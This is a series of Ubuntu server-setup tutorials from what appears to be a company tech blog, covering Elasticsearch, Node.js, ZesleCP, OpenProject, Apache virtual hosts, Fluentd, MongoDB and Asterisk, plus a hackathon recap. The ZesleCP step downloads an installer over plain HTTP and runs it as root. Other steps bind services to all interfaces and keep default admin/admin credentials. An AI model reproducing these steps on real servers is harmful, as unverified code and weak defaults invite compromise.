Elasticsearch Cluster on Ubuntu 14.04

Featured

Elasticsearch is a popular open-source search server used for real-time distributed search and analysis of data. When used for anything other than development, Elasticsearch should be deployed across multiple servers as a cluster for the best performance, stability, and scalability.

elasticsearch_logo

Demonstration:

OMegha Platform.

Image – Ubuntu-14.04

Prerequisites:

You must have at least three Ubuntu 14.04 servers to complete this tutorial, because an Elasticsearch cluster should have a minimum of three master-eligible nodes. If you want to have dedicated master and data nodes, you will need at least three servers for your master nodes plus additional servers for your data nodes.

Install Java 8:

Elasticsearch requires Java, so we will install that now. We will install a recent version of Oracle Java 8 because that is what Elasticsearch recommends. It should, however, work fine with OpenJDK, if you decide to go that route.

Complete this step on all of your Elasticsearch servers.

Add the Oracle Java PPA to apt:

$ sudo add-apt-repository -y ppa:webupd8team/java

Update your apt package database:

$ sudo apt-get update

Install the latest stable version of Oracle Java 8 with this command (and accept the license agreement that pops up):

$ sudo apt-get -y install oracle-java8-installer

Be sure to repeat this step on all of your Elasticsearch servers.

Now that Java 8 is installed, let’s install Elasticsearch.

Install Elasticsearch:

Elasticsearch can be downloaded directly from elastic.co in zip, tar.gz, deb, or rpm packages. For Ubuntu, it’s best to use the deb (Debian) package, which installs everything you need to run Elasticsearch.

$ wget https://download.elastic.co/elasticsearch/elasticsearch/elasticsearch-1.7.2.deb

Then install it in the usual Ubuntu way with the dpkg command like this:

$ sudo dpkg -i elasticsearch-1.7.2.deb

This results in Elasticsearch being installed in /usr/share/elasticsearch/, with its configuration files placed in /etc/elasticsearch and its init script added in /etc/init.d/elasticsearch. To make Elasticsearch start automatically on boot, run:

$ sudo update-rc.d elasticsearch defaults

Be sure to repeat these steps on all of your Elasticsearch servers.

Elasticsearch is now installed, but it needs to be configured before you can use it.

Configure Elasticsearch Cluster:

Now it’s time to edit the Elasticsearch configuration. Complete these steps on all of your Elasticsearch servers.

Open the Elasticsearch configuration file for editing:

$ sudo vi /etc/elasticsearch/elasticsearch.yml

Set Cluster Name:

Next, set the name of your cluster, which will allow your Elasticsearch nodes to join and form the cluster. You will want to use a descriptive name that is unique within your network.

Find the line that specifies cluster.name, uncomment it, and replace its value with your desired cluster name. In this tutorial, we will name our cluster “elasticsearch_cluster”:

ELK1
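In elasticsearch.yml, the resulting line looks like this (the cluster name below is simply the one chosen for this tutorial):

cluster.name: elasticsearch_cluster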

Set Node Name:

Next, we will set the name of each node. This should be a descriptive name that is unique within the cluster.

Find the line that specifies node.name, uncomment it, and replace its value with your desired node name. In this tutorial, we will set each node name to the hostname of the server by using the ${HOSTNAME} environment variable:

ELK2
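The resulting line looks like this (Elasticsearch expands the ${HOSTNAME} environment variable when it starts):

node.name: ${HOSTNAME}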

For Master Node:

For a master node, set node.master to true and node.data to false:

ELK3
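For example, the relevant lines in elasticsearch.yml on a dedicated master node would be:

node.master: true
node.data: false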

For Data Node:

For a data node, set node.master to false and node.data to true:

ELK4
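And on a dedicated data node:

node.master: false
node.data: true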

Network Host:

Set network.host to 0.0.0.0 so Elasticsearch listens on all interfaces:

ELK5
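The resulting line:

network.host: 0.0.0.0

Note that 0.0.0.0 makes Elasticsearch listen on all interfaces, so if your servers have public interfaces, restrict access to ports 9200 and 9300 with a firewall or bind to a private address instead.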

Set Discovery Hosts:

Next, you will need to configure an initial list of nodes that will be contacted to discover and form a cluster. This is necessary in a unicast network.

Find the line that specifies discovery.zen.ping.unicast.hosts and uncomment it.

For example, if you have three servers node01, node02, and node03 with respective VPN IP addresses of 10.0.0.1, 10.0.0.2, and 10.0.0.3, you could use this line:

ELK6
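With the example addresses above, the uncommented line would be:

discovery.zen.ping.unicast.hosts: ["10.0.0.1", "10.0.0.2", "10.0.0.3"]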

Save and exit elasticsearch.yml.

Your servers are now configured to form a basic Elasticsearch cluster. There are more settings that you will want to update, but we’ll get to those after we verify that the cluster is working.

Start Elasticsearch:

Now start Elasticsearch:

$ sudo service elasticsearch restart

Then run this command to start Elasticsearch on boot:

$ sudo update-rc.d elasticsearch defaults 95 10

Be sure to repeat these steps (Configure Elasticsearch) on all of your Elasticsearch servers.

Testing:

By now, Elasticsearch should be running on port 9200. You can test it with curl, the command-line HTTP client, and a simple GET request like this:

$ curl -X GET 'http://localhost:9200'

You should see the following response:

ELK7
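The response is a small JSON document along these lines (the node name, cluster name, and build details will differ on your servers):

{
  "status" : 200,
  "name" : "node01",
  "cluster_name" : "elasticsearch_cluster",
  "version" : {
    "number" : "1.7.2",
    ...
  },
  "tagline" : "You Know, for Search"
}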

If you see a response similar to the one above, Elasticsearch is working properly. If not, make sure that you have followed the installation instructions correctly and that you have allowed some time for Elasticsearch to fully start.

Check Cluster State:

If everything was configured correctly, your Elasticsearch cluster should be up and running. Before moving on, let’s verify that it’s working properly. You can do so by querying Elasticsearch from any of the Elasticsearch nodes.

From any of your Elasticsearch servers, run this command to print the state of the cluster:

$ curl -XGET 'http://localhost:9200/_cluster/state?pretty'

EL8

If you see output that is similar to this, your Elasticsearch cluster is running. If any of your nodes are missing, review the configuration for the node(s) in question before moving on.

Next, we’ll go over some configuration settings that you should consider for your Elasticsearch cluster.

Enable Memory Locking:

Elastic recommends avoiding swapping of the Elasticsearch process at all costs, due to its negative effects on performance and stability. One way to avoid excessive swapping is to configure Elasticsearch to lock the memory that it needs.

Complete this step on all of your Elasticsearch servers.

Edit the Elasticsearch configuration:

$ sudo vi /etc/elasticsearch/elasticsearch.yml

Find the line that specifies bootstrap.mlockall and uncomment it:

ELK9
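The uncommented line should read:

bootstrap.mlockall: true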

Save and exit.

Now restart Elasticsearch to put the changes into place:

$ sudo service elasticsearch restart

Cluster Health:

This API can be used to see general info on the cluster and gauge its health:

$ curl -XGET 'localhost:9200/_cluster/health?pretty'

ELK10

Cluster State:

This API can be used to see a detailed status report on your entire cluster. You can filter results by specifying parameters in the call URL.

$ curl -XGET 'localhost:9200/_cluster/state?pretty'

ELK11

Conclusion:

Your Elasticsearch cluster should now be running in a healthy state and configured with some basic optimizations.

 

Node.js Installation

Featured

Node.js is a cross-platform runtime environment and library for running JavaScript applications, used to create networking and server-side applications.

It is used to develop I/O intensive web applications like video streaming sites, single-page applications, and other web applications.

Prerequisites

To follow this blog, you will need:

  • One Ubuntu 16.04 server set up by following this initial server setup, including a sudo non-root user.

Node.js Installation In Ubuntu 16.04

Step-1 Update the Package List

Before installing Node.js on the Ubuntu system, update the package lists from all available repositories.

sudo apt-get update

Step-2  Install Node.js

Run the command below to install the standard Node.js package:

sudo apt-get install nodejs

Step-3 Install NPM

Most Node.js workflows also need npm, the Node.js package manager. Install the npm package using the command below:

sudo apt-get install npm

In order for some npm packages to work (those that require compiling code from source, for example), you will need to install the build-essential package:

sudo apt-get install build-essential

Installation Check

After installing Node.js and npm, check that the installation is correct by typing the following commands:

Node.js Installation Check

nodejs --version

NPM Installation Check

npm --version
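As an additional sanity check beyond the version numbers, you can run a one-line script (hello.js is just a throwaway file name used for illustration):

$ echo "console.log('Node.js is working');" > hello.js
$ nodejs hello.js
Node.js is working

Note that on Ubuntu 16.04 the interpreter installed from the distribution packages is called nodejs rather than node, to avoid a name clash with an older unrelated package.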

Remove Node.js

To remove Node.js from the Ubuntu system completely, use the following commands:

Remove Package without Configuration Files

This command removes Node.js, but its configuration files remain, so they will be reused the next time you install Node.js.

sudo apt-get remove nodejs

Remove Package with Configuration Files

If you don’t want to keep the configuration files, use the following command instead:

sudo apt-get purge nodejs

Finally, Remove Unused Packages

To remove the unused packages that were installed with Node.js, run the following command:

sudo apt-get autoremove 

Installing Open Source Hosting Control Panel (ZesleCP) on Ubuntu 16.04

Featured

Zesle Control Panel

Secure Web Control Panel for your needs…

ZCP

Zesle is a popular open-source control panel that anyone can download and install. It is very simple and can be installed with just one command.

System Requirements:

  • Ubuntu 14/16
  • 1Ghz CPU
  • 512MB RAM
  • 10+GB DISK

Zesle is simple and very user friendly. Using Zesle you’ll be able to do the tasks below…

  • Add multiple domains without hassle;
  • Add multiple sub domains;
  • Install WordPress easily with one-click app;
  • Install free Let’s Encrypt SSL certificates with ease;
  • Configure basic PHP settings;
  • Manage Email accounts;
  • Access phpMyAdmin.

and much more. Let’s see how to install Zesle in your hosting.

Step 1: It’s super easy to install Zesle. Run the following command with root privileges.

$ cd /home && curl -o latest -L http://zeslecp.com/release/latest && sh latest

Step 2: The installation will begin, and partway through it will ask for the admin’s email address. Provide your email address and press Enter.

Step 3: You will see the below screen at the end of the installation.

zcsp1.png

Step 4: This is what Zesle looks like. Once the installation is completed, it will show you the temporary password and the login URL.

Step 5: The login URL will be your IP address followed by the port number (2087 is the default). For example, https://11.11.11.111:2087 is a sample URL.

Step 6: Just enter this in your browser and you’ll get the login screen.

zcsp2

Step 7: Use root as your username.

Step 8: Copy and paste the temporary root password provided. Once you have entered the correct password, the control panel will open, and this is how it looks. All the options mentioned above are available on the left side of the UI.

zcsp3

Step 9: In the Dashboard, you can create your account and install WordPress on your domain using “One Click Apps”.

Step 10: That concludes the installation steps for the free Linux web hosting control panel ZesleCP.

 

Installation of Open Project Management System on Ubuntu 16.04

Featured

OpenProjectLogo

OpenProject is a web-based management system for location-independent team collaboration, released under the GNU GPL v3 license. It is project management software that provides task management, team collaboration, scrum, and more. OpenProject is written in Ruby on Rails and AngularJS. In this tutorial, I will show you how to install and configure the OpenProject management system on Ubuntu 16.04. The tool can be installed manually or by using packages from the repository. For this guide, we will install OpenProject from the repository.

Prerequisites

  •  Ubuntu 16.04.
  •  Good Internet Connectivity.
  •  Root Privileges.

What we will do

  • Update and Upgrade System.
  • Install Open Project Management System.
  • Configure the Open Project System.
  • Testing.

Step 1: Update and Upgrade System

Before installing OpenProject on the Ubuntu system, update all available repositories and upgrade the system.

Run the following commands.

$ sudo apt update
$ sudo apt upgrade -y

Step 2: Install Open Project Management System

Download the OpenProject repository key and add it to the system.

$ sudo wget -qO- https://dl.packager.io/srv/opf/openproject-ce/key | sudo apt-key add -

Then download the OpenProject repository file for Ubuntu 16.04 into the ‘/etc/apt/sources.list.d’ directory.

$ sudo wget -O /etc/apt/sources.list.d/openproject-ce.list \
  https://dl.packager.io/srv/opf/openproject-ce/stable/7/installer/ubuntu/16.04.repo

Now update the Ubuntu package lists and install OpenProject using the apt command as shown below.

$ sudo apt update
$ sudo apt-get install openproject -y

Step 3: Configure the Open Project System

Run the OpenProject configuration command. A dialog-based configuration wizard will appear.

$  sudo openproject configure

op1

Select ‘Install and configure MySQL server locally’ and click ‘OK’. This will automatically install the MySQL server on the system and create the database for the OpenProject installation.

For the web server configuration, choose ‘Install apache2 server’ and click ‘OK’. This will automatically install the Apache2 web server and configure a virtual host for the OpenProject application.

op2

Now type the domain name for your OpenProject application, and choose ‘OK’.

Next comes the SSL configuration: choose ‘yes’ if you have purchased SSL certificates for the domain, or ‘no’ if you don’t have SSL certificates.

op3

Skip the Subversion support, GitHub support, and SMTP configuration (if not needed).

For the memcached installation, choose ‘Install’ and select ‘OK’ for better OpenProject performance.

op4

Finally, installation and configuration of all the packages required for OpenProject should happen automatically.

Step 4: Testing

Check whether the Open Project service is up and running.

$  sudo service openproject status

Now run the openproject web service using the following command.

$  sudo openproject run web

Now open your web browser and type your floating IP (or the domain you configured) in the address bar to access the system.

op5

Now click the ‘Sign in’ button to log in to the admin dashboard. The initial credentials are ‘admin’ for both the username and the password; you can change them later.

Finally, the installation and configuration of OpenProject on Ubuntu 16.04 has been completed successfully.

 

 

 

Apache Virtual Hosts on Ubuntu 14.04

Featured

The Apache web server is the most popular way of serving web content on the internet. It accounts for more than half of all active websites on the internet and is extremely powerful and flexible.

Apache breaks its functionality and components into individual units that can be customized and configured independently. The basic unit that describes an individual site or domain is called a Virtual Host.

virtual-hosting-apache

These designations allow the administrator to use one server to host multiple domains or sites off of a single interface or IP by using a matching mechanism. This is relevant to anyone looking to host more than one site off of a single VPS.

In this document, we will walk you through how to set up Apache virtual hosts on an Ubuntu 14.04 VPS. During this process, you’ll learn how to serve different content to different visitors depending on which domains they are requesting.

Prerequisites

  • Before you begin this tutorial, you should create a non-root user.
  • You will also need to have Apache installed in order to work through these steps.

Demonstration:

OMegha platform.

Image – Ubuntu-14.04

Let’s get started.

First, we need to update the package list.

$ sudo apt-get update

VH1

Install Apache

$ sudo apt-get install apache2

VH2

For the purposes of this document, my configuration will make a virtual host for infra.com and another for infra1.com.

Step 1: Create the Directory Structure

Our document root will be set to individual directories under the /var/www directory. We will create a directory here for both of the virtual hosts we plan on making.

Within each of these directories, we will create a public_html folder that will hold our actual files. This gives us some flexibility in our hosting.

$ sudo mkdir -p /var/www/infra.com/public_html

$ sudo mkdir -p /var/www/infra1.com/public_html

The domain portions of these paths (infra.com and infra1.com) represent the domain names that we want to serve from our VPS.

Step 2: Grant Permissions

Changing the Ownership

$ sudo chown -R $USER:$USER /var/www/infra.com/public_html

$ sudo chown -R $USER:$USER /var/www/infra1.com/public_html

VH3

We should also modify our permissions a little to ensure that read access is permitted to the general web directory and all of the files and folders it contains:

$ sudo chmod -R 755 /var/www

Step 3: Create Demo Pages for Each Virtual Host

We have to create an index.html file for each site.

Let’s start with infra.com. We can open an index.html file in our editor by typing:

$ sudo vi /var/www/infra.com/public_html/index.html

In this file, create a simple HTML document that indicates which site it is connected to. My file looks like this:

<html>
  <head>
    <title>Welcome to infra.com!</title>
  </head>
  <body>
    <h1>Success!  The infra.com virtual host is working!</h1>
  </body>
</html>

Save and close the file when you are finished.

We can copy this file to use as the basis for our second site by typing:

$ cp /var/www/infra.com/public_html/index.html /var/www/infra1.com/public_html/index.html

Then we can open the file and modify the relevant pieces of information:

$ sudo vi /var/www/infra1.com/public_html/index.html

<html>
  <head>
    <title>Welcome to infra1.com!</title>
  </head>
  <body>
    <h1>Success!  The infra1.com virtual host is working!</h1>
  </body>
</html>

Save and close the file.

Step 4: Create New Virtual Host Files

Virtual host files are the files that specify the actual configuration of our virtual hosts and dictate how the Apache web server will respond to various domain requests.

Apache comes with a default virtual host file called 000-default.conf, and we can copy it to create the virtual host file for our first domain.

Creating First Virtual Host File

Start by copying the file for the first domain

$ sudo cp /etc/apache2/sites-available/000-default.conf /etc/apache2/sites-available/infra.com.conf

Open the new file in your editor with root privileges

$ sudo vi /etc/apache2/sites-available/infra.com.conf

Our virtual host file should look like this:

<VirtualHost *:80>
    ServerAdmin admin@infra.com
    ServerName infra.com
    ServerAlias www.infra.com
    DocumentRoot /var/www/infra.com/public_html
    ErrorLog ${APACHE_LOG_DIR}/error.log
    CustomLog ${APACHE_LOG_DIR}/access.log combined
</VirtualHost>

Save and close the file.

Copy the First Virtual Host and Customize for the Second Domain

Now that we have our first virtual host file established, we can create our second one by copying that file and adjusting it as needed.

Start by copying

$ sudo cp /etc/apache2/sites-available/infra.com.conf /etc/apache2/sites-available/infra1.com.conf

Open the new file with root privileges

$ sudo vi /etc/apache2/sites-available/infra1.com.conf

You now need to modify all of the pieces of information to reference your second domain. When you are finished, it may look something like this

<VirtualHost *:80>
    ServerAdmin admin@infra1.com
    ServerName infra1.com
    ServerAlias www.infra1.com
    DocumentRoot /var/www/infra1.com/public_html
    ErrorLog ${APACHE_LOG_DIR}/error.log
    CustomLog ${APACHE_LOG_DIR}/access.log combined
</VirtualHost>

Save and close the file.

Step 5: Enable the New Virtual Host Files

The virtual host files we created need to be enabled.

We can use the a2ensite tool to enable each of our sites

$ sudo a2ensite infra.com.conf

$ sudo a2ensite infra1.com.conf

VH4

Restart the apache server.

$ sudo service apache2 restart
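Optionally, you can ask Apache to validate the configuration syntax; apache2ctl is installed along with the apache2 package and this is a quick sanity check before or after restarting:

$ sudo apache2ctl configtest

It should report “Syntax OK” if the new virtual host files are well formed.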

Step 6: Setup Local Hosts File

$ sudo vi /etc/hosts

The details that you need to add are the public IP address of your VPS server followed by the domain you want to use to reach that VPS.

127.0.0.1 localhost

***.***.***.*** infra.com

***.***.***.*** infra1.com

Save and close the file.

This will intercept any requests for infra.com and infra1.com made on our computer and send them to our server at the IP address specified above.

Step 7: Test Your Results

Now that you have your virtual hosts configured, you can test your setup easily by going to the domains that you configured in your web browser

http://infra.com

VH5

You should see a page that looks like this

Likewise, you can visit your second page:

http://infra1.com

VH6

You will see the file you created for your second site

Step 8: Conclusion

If both of these sites work well, you’ve successfully configured two virtual hosts on the same server.

If you need to access this long term, consider purchasing a domain name for each site you need and setting it up to point to your VPS server.

Centralize Logs from Node.js Applications

Featured

Prerequisites

  • Installation of Node.js and NPM
  • Installation of Fluentd

Modifying the Config File

Next, please configure Fluentd to use the forward Input plugin as its data source.

$ sudo vi /etc/td-agent/td-agent.conf

The Fluentd daemon should listen on a TCP port.

A simple configuration looks like the following:

1
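A minimal td-agent.conf for this step might look like the following sketch, assuming the default forward port 24224 and a tag prefix of fluentd.test (the stdout match simply writes incoming events to td-agent’s own log so you can see them arrive):

<source>
  @type forward
  port 24224
  bind 0.0.0.0
</source>

<match fluentd.test.**>
  @type stdout
</match>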

Restart your agent once these lines are in place.

$ sudo service td-agent restart

fluent-logger-node

Install fluent-logger-node

$ npm install fluent-logger

Now use npm to install your dependencies locally:

$ npm install

Send an event record to Fluentd

index.js

This is the simplest web app.

2
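A sketch of what index.js could look like, assuming Express and fluent-logger are listed as dependencies in package.json; the tag prefix fluentd.test matches the configuration above, and the record fields are arbitrary examples:

// index.js - minimal Express app that forwards an event to Fluentd per request
var express = require('express');
var logger = require('fluent-logger');

// Point fluent-logger at the local Fluentd forward input (default port 24224).
logger.configure('fluentd.test', {
  host: 'localhost',
  port: 24224,
  timeout: 3.0
});

var app = express();

app.get('/', function (request, response) {
  // Emit one event record per request; it arrives in Fluentd tagged fluentd.test.follow.
  logger.emit('follow', { from: 'userA', to: 'userB' });
  response.send('Hello World!');
});

app.listen(4000, function () {
  console.log('Listening on http://localhost:4000');
});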

Run the app and go to http://localhost:4000 in your browser. This will send the logs to Fluentd.

$ node index.js

3

The logs should be output to /var/log/td-agent/td-agent.log  

Store Logs into MongoDB

Fluentd does 3 things:

  1. It continuously “tails” the access log file.
  2. It parses the incoming log entries into meaningful fields (such as ip, path, etc.) and buffers them.
  3. It writes the buffered data to MongoDB periodically.

Configuration         

Fluentd’s config file

$ sudo vi /etc/td-agent/td-agent.conf

 The Fluentd configuration file should look like this:

4
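A sketch of what this configuration could contain, assuming the fluent-plugin-mongo output plugin is available (it ships with td-agent) and MongoDB runs on the same host; the log path, database, and collection names are illustrative:

<source>
  @type tail
  format apache2
  path /var/log/apache2/access.log
  pos_file /var/log/td-agent/access.log.pos
  tag mongo.apache.access
</source>

<match mongo.**>
  @type mongo
  host localhost
  port 27017
  database apache
  collection access
  flush_interval 10s
</match>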

Restart your agent once these lines are in place.

$ sudo service td-agent restart

Then, access MongoDB and see the stored data.

$ mongo

5

Fluentd + MongoDB makes real-time log collection simple, easy, and robust.

Installation of MongoDB on Ubuntu 16.04

Featured

MongoDB is a free and open-source NoSQL document database used commonly in modern web applications.

mongodb

MongoDB is one of several database types to arise in the mid-2000s under the NoSQL banner. Instead of using tables and rows as in relational databases, MongoDB is built on an architecture of collections and documents. Documents comprise sets of key-value pairs and are the basic unit of data in MongoDB. Collections contain sets of documents and function as the equivalent of relational database tables.

Like other NoSQL databases, MongoDB supports dynamic schema design, allowing the documents in a collection to have different fields and structures. The database uses a document storage and data interchange format called BSON, which provides a binary representation of JSON-like documents. Automatic sharding enables data in a collection to be distributed across multiple systems for horizontal scalability as data volumes increase.
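To make the documents and collections idea concrete, here is a tiny mongo shell session (a sketch; the collection name and fields are arbitrary):

$ mongo
> db.people.insert({ "name": "Tom", "hobbies": ["chess", "hiking"] })
> db.people.find().pretty()

Each insert stores one document; the people collection groups those documents much like a table groups rows, but without a fixed schema.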

This blog will help you set up MongoDB on your server for a production application environment.

Prerequisites

To follow this blog, you will need:

  • One Ubuntu 16.04 server set up by following this initial server setup, including a sudo non-root user.

Adding the MongoDB Repository

MongoDB is already included in the Ubuntu package repositories, but the official MongoDB repository provides the most up-to-date version and is the recommended way of installing the software. In this step, we will add this official repository to our server.

Ubuntu ensures the authenticity of software packages by verifying that they are signed with GPG keys, so we first have to import the key for the official MongoDB repository.

$ sudo apt-key adv --keyserver hkp://keyserver.ubuntu.com:80 --recv EA312927

After successfully importing the key, you will see:

gpg: Total number processed: 1
gpg:        imported: 1    (RSA:  1)

Next, we have to add the MongoDB repository details so apt will know where to download the packages from.

Issue the following command to create a list file for MongoDB.

$ echo "deb http://repo.mongodb.org/apt/ubuntu xenial/mongodb-org/3.2 multiverse" | sudo tee /etc/apt/sources.list.d/mongodb-org-3.2.list

After adding the repository details, we need to update the packages list.

$ sudo apt-get update

Installing and Verifying MongoDB

Now we can install the MongoDB package itself.

$ sudo apt-get install -y mongodb-org

This command will install several packages containing the latest stable version of MongoDB, along with helpful management tools for the MongoDB server.

Next, start MongoDB with systemctl.

$ sudo systemctl start mongod

You can also use systemctl to check that the service has started properly.

$ sudo systemctl status mongod
$ mongo

mongodb.service - High-performance, schema-free document-oriented database
Loaded: loaded (/etc/systemd/system/mongodb.service; enabled; vendor preset: enabled)
Main PID: 4093 (mongod)
Tasks: 16 (limit: 512)
Memory: 47.1M
CPU: 1.224s
CGroup: /system.slice/mongodb.service
└─4093 /usr/bin/mongod --quiet --config /etc/mongod.conf

The last step is to enable MongoDB to start automatically when the system boots.

$ sudo systemctl enable mongod

The MongoDB server is now configured and running, and you can manage the MongoDB service using the systemctl command (e.g. sudo systemctl stop mongod, sudo systemctl start mongod).

Installing Asterisk on Ubuntu 16.04

Featured

Asterisk is a software implementation of a telephone private branch exchange (PBX). It allows telephones interfaced with a variety of hardware technologies to make calls to one another, and to connect to telephony services, such as the public switched telephone network (PSTN) and voice over Internet Protocol (VoIP) services. Its name comes from the asterisk symbol “*”.

Asterisk_Logo.svg

Some of the many features of Asterisk include:

  • The Asterisk software includes many features available in commercial and proprietary PBX systems: voice mail, conference calling, interactive voice response, and automatic call distribution.
  • Users can create new functionality by writing dial plan scripts in several of Asterisk’s own extension languages, by adding custom loadable modules written in C, or by implementing Asterisk Gateway Interface (AGI) programs using any programming language capable of communicating via the standard streams system (stdin and stdout) or by network TCP sockets.
  • Asterisk supports several standard voice over IP protocols, including the Session Initiation Protocol (SIP), the Media Gateway Control Protocol (MGCP), and H.323.
  • Asterisk supports most SIP telephones, acting both as registrar and back-to-back user agent.
  • By supporting a variety of traditional and VoIP telephony services, Asterisk allows deployers to build telephone systems, or migrate existing systems to new technologies.

asterisk arc

 Install Asterisk from Source

After logging in to your Ubuntu server as a user, issue the following command to switch to the root user.

$ sudo su 

Now you are root, but you need to set the password with the following command.

# passwd

Next step would be to install initial dependencies for asterisk.

# apt-get install build-essential wget libssl-dev libncurses5-dev libnewt-dev libxml2-dev linux-headers-$(uname -r) libsqlite3-dev uuid-dev git subversion

Installing Asterisk

Now that we are root and the dependencies are satisfied, we can move to the /usr/src/ directory and download the latest Asterisk version there.

# cd /usr/src
# wget http://downloads.asterisk.org/pub/telephony/asterisk/asterisk-15-current.tar.gz

Next we unpack it.

# tar zxvf asterisk-15-current.tar.gz

Now we need to enter the newly unpacked directory:

# cd asterisk-15*

Before we actually compile the Asterisk code, we need ‘pjproject’, as Asterisk 15 introduces support for PJSIP. So we will compile it first:

# git clone git://github.com/asterisk/pjproject pjproject
# cd pjproject
# ./configure --prefix=/usr --enable-shared --disable-sound --disable-resample --disable-video --disable-opencore-amr CFLAGS='-O2 -DNDEBUG'
# make dep
# make && make install
# ldconfig
# ldconfig -p |grep pj

Configuring Asterisk

Now we can configure and compile the Asterisk code.

# cd ..
# contrib/scripts/get_mp3_source.sh
# contrib/scripts/install_prereq install

This will install MP3 tones and satisfy additional dependencies, which might take some time and will ask you for your country code. The following command will configure, compile, and install Asterisk:

# ./configure && make menuselect && make && make install

When that is finished, to avoid writing hundreds of config files yourself, you will normally want to run this command after installation, which will create an initial configuration for you:

# make samples

To have the startup script installed and enabled so that Asterisk starts on every boot, we run make config, followed by ldconfig:

# make config
# ldconfig

Now we can start asterisk for the first time and see if it actually works.

# /etc/init.d/asterisk start

Then we can enter the Asterisk console with this command:

# asterisk -rvvv

Now we need to do a few additional steps to make Asterisk run as the asterisk user. First, we need to stop Asterisk:

# systemctl stop asterisk

Then we need to add group and user named asterisk.

# groupadd asterisk
# useradd -d /var/lib/asterisk -g asterisk asterisk

Asterisk needs to be configured to start as the user we just created. We can edit /etc/default/asterisk by hand, but it is quicker to use the following two sed commands:

# sed -i 's/#AST_USER="asterisk"/AST_USER="asterisk"/g' /etc/default/asterisk
# sed -i 's/#AST_GROUP="asterisk"/AST_GROUP="asterisk"/g' /etc/default/asterisk

To run properly, the asterisk user needs to be given ownership of all essential Asterisk directories:

# chown -R asterisk:asterisk /var/spool/asterisk /var/run/asterisk /etc/asterisk /var/{lib,log,spool}/asterisk /usr/lib/asterisk

The asterisk.conf file also needs to be edited to uncomment the lines for runuser and rungroup:

# sed -i 's/;runuser = asterisk/runuser = asterisk/g' /etc/asterisk/asterisk.conf
# sed -i 's/;rungroup = asterisk/rungroup = asterisk/g' /etc/asterisk/asterisk.conf

When this is done, reboot the server so that Asterisk is brought up automatically by systemd, and then type asterisk -rvvv to enter the Asterisk console.

# asterisk -rvvv

 

HACKSTACK 1.0

In the month of July 2022 within the office walls of Infrastack-Labs, discussions for conducting a Hackathon were brewing. A plan for a themed Hackathon focused on Industry 4.0 technologies was conceived. Big-Data, Cyber security, IoT, and Cloud computing all will take centre stage in this 24-hour hackathon.

 InfraStack-Labs is a technology-driven company that has always strived to be a forerunner in the industry, with the company ethos of innovation InfraStack-Labs set out to create a 24-hour hackathon that would become the torchbearer for innovation and serve as a platform to galvanize the minds of the youth of our country.

This Hackathon was envisaged as a highly collaborative event where students from all across the country would come together as teams and work on projects to solve real-world problems. A plan for a thrilling and fun 24 hours was drawn up by the team at InfraStack-Labs Which was named Hackstack.

The registrations began on July 17th and closed on 5th August 2022. The response from students was overwhelmingly positive; colleges from all over India registered for Hackstack 1.0. The teams submitted innovative and groundbreaking ideas which, through an extensive round of scrutiny, were shortlisted, leaving us with the top 12 teams who would participate in the 24 hours of Hackstack 1.0.

The event kicked off at 8:30 AM on the 19th of August with teams registering at the venue which was followed by a quick breakfast. Once the teams were settled in we began the introduction session where our CTO Mr. Ajith Narayanan explained the idea behind the Hackathon and also proceeded to welcome everyone.

At 11:30 AM the timer started, signaling the start of the build. At this point, teams started to put their thinking caps on and get to work. One could feel the intensity in the room as the promising engineers started making sketches and laying out plans. Our team who have been on site and facilitating everyone got a chance to interact with the students. We were all amazed by the sheer caliber of the participants.

While the build progressed, lunch was served at 2:00 PM, giving most teams time to clear their minds and get some fresh air before heading back into the high-octane environment that Hackstack 1.0 was turning out to be. As the evening approached, we could see many projects coming into shape. Once-empty work desks were now full of amazing tech.

We had an enclosed turf on the premises where teams could blow off some steam, “all work and no play makes Tommy a dull boy”. After tea at 5:00 PM, a trivia quiz was conducted. It was very entertaining with quippy answers and electrifying enthusiasm. Winners of the Quiz received top-of-the-line smartwatches as prizes.

Teams resumed work on their projects, and they were on track, meeting the goals they had set for themselves but all that was just about to change. The judges started arriving and started interacting with the teams. The judges spent a considerable amount of time with the participants, going through each and every detail of their project. Teams used the feedback from the judges to optimize their projects.

All this pressure was enough to drum up an appetite. A sumptuous dinner was served at 9:00 PM, which definitely lifted spirits and amped up everyone for the remainder of the night. At 1:00 AM a game of Pictionary was organized; it turned out to be like an episode straight out of ‘The Big Bang Theory’. By 3:00 AM you could see the sleep-deprived souls still hard at work fixing bugs and testing out their projects. As the day dawned and the timer approached zero, one could see the faces light back up as excitement crept back in. A countdown followed by a round of cheers and applause at 7:30 AM marked the end of the build.

The final stage was the presentations: each team would pitch their project for 10 minutes and interact with the judges. Afterward, the judges deliberated for a while before listing out the winners. Twenty-four hours had boiled down to this moment; the participants, all with their fingers crossed, listened as the results were announced.

Team “Name doesnt matter” was chosen as the 2nd runner up

Team Alpha from KPR Institute of Engineering and Technology was chosen 1st runner up

Team A2Z Tech Valley from Sri Krishna college of Engineering and technology was chosen as the winners

Hackstack 1.0 was a massive hit with the participants, the feedback from the participants described the event as “perfect”, most expressed their desire to come back next year, and surely Hackstack will be bigger and better to welcome them!

Watch the full video here : –HackStack v1.0 – An Industry 4.0 themed 24 hrs Hackathon

Scope of Big Data Applications

Every day, we produce 2.5 quintillion bytes of data, so much that 90% of the data in the world today has been created in the last two years alone. The data that comes from different sources is converted into useful information using big data analytics. This large amount of continuously produced data is what can be called Big Data. Big data analytics opens up a wide range of opportunities in several fields.

Big data analysis mainly involves analytical methods for big data, the systematic architecture of big data, and big data mining and analysis software. Data acquisition is the most important step in big data for exploring meaningful values and giving suggestions and decisions. Possible values can be explored by data analysis, and the collected data must also be suitable for that analysis.

Earlier, companies relied on traditional advertising to market their products, but that offered little in the way of a targeted approach. Nowadays, companies mostly use digital marketing to promote their products, and in digital marketing, with the help of big data applications, it is easy to target the right leads for the business.

APPLICATIONS OF BIG DATA

  • Market the product to right audience
  • Fraud Detection and risk management
  • Supply chain Management
  • Direct Innovation and product development

Challenges in Big Data Applications

In big data projects, the most important thing is the data itself. With this data, organizations build predictive models for their future systems. So if we miss any data while collecting from all scenarios, it may cause a massive negative impact on decision making; that is, if we miss data during collection, or get wrong input during analysis, we will end up with wrong predictive models and may make wrong decisions. This is one of the main challenges faced in big data analysis. Big data is a significant area which offers numerous benefits and innovations. It is a remarkable sphere with a promising future, if approached rightly. The difficulty with big data comes mainly from its size, which requires proper storage, management, integration, cleansing, processing, and analysis.

Characteristics of Big Data

Types of Big Data


Installing Monitorix -OpenSource Lightweight System Monitoring tool

What is Monitorix ?

Monitorix is an open-source, lightweight system monitoring tool for Linux operating systems, and it is used in production environments. It is also a network monitoring tool that collects system data and shows it in a web interface through graphs.

Monitorix consists of the following graphs:

  • Global kernel/per-processor kernel usage
